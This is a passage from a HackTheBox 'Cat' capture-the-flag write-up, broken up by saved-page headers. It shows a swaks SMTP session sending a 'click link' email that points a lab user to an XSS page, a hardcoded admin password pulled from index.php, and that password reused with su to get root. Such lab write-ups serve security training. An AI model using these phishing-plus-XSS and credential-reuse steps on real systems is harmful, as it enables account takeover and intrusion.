<- 250-ETRN
<- 250-AUTH DIGEST-MD5 CRAM-MD5
<- 250-DELIVERBY
<- 250 HELP
-> MAIL FROM:<axel@localhost>
<- 250 2.1.0 <axel@localhost>... Sender ok
-> RCPT TO:<jobert@localhost>
<- 250 2.1.5 <jobert@localhost>... Recipient ok
-> DATA
<- 354 Enter mail, end with "." on a line by itself
-> Date: Sun, 02 Feb 2025 11:39:36 +0300
file:///home/core/Downloads/HackTheBox Cat.html 23/25
2/2/25, 1:13 PM HackTheBox Cat

-> To: jobert@localhost


-> From: axel@localhost
-> Subject: click link
-> Message-Id: <20250202113936.006274@vm>
-> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
->
-> http://localhost:3000/axel/xss
->
->
-> .
<- 250 2.0.0 5128daGS009077 Message accepted for delivery
-> QUIT
<- 221 2.0.0 cat.htb closing connection
=== Connection closed with remote host.

Finally, we should catch the source code of the index.php file , in which the password is
hardcoded:

Decoding via CyberChef :

<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';
...

And we try to use this password for the root user via su :

$ su
IKw75eR0MR7CMIxhH0

Superuser flag

file:///home/core/Downloads/HackTheBox Cat.html 24/25


2/2/25, 1:13 PM HackTheBox Cat

file:///home/core/Downloads/HackTheBox Cat.html 25/25

You might also like